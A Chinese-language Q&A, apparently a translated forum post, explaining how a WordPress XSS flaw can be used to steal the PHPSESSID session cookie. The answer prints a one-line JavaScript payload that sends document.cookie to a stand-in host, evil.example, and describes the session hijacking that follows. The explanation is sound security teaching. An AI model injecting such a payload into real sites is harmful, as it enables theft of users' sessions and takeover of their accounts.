Wordpress XSS漏洞(抓住PHPSESSID)

时间:2013-05-04 18:35:27

标签: wordpress security xss

我刚刚开始研究网站的漏洞,我对Wordpress的XSS漏洞有疑问。通过此漏洞利用,攻击者可以使用简单的Javascript命令获取PHPSESSID:

(alert(document.cookie))

攻击者如何使用此功能?这是一个严重的安全问题吗?

1 个答案:

答案 0 :(得分:1)

alert(…)只是proof of concept,它证明了XSS漏洞的成功利用。它不会用于实际攻击,因为它不会给攻击者带来任何好处。

在真正的攻击中,攻击者会尝试以某种方式获取document.cookie的值。一个简单的例子是使用JavaScript伪造一个包含document.cookie值的简单HTTP请求,如下所示:

new Image().src="http://evil.example/?"+document.cookie

这会创建一个图像,攻击者的URL作为图像源,并附加cookie。

使用受害者的cookie,攻击者可以hijack the victim’s session并使用与受害者相同的权限使用WordPress。如果受害者是管理员,攻击者可以访问管理功能。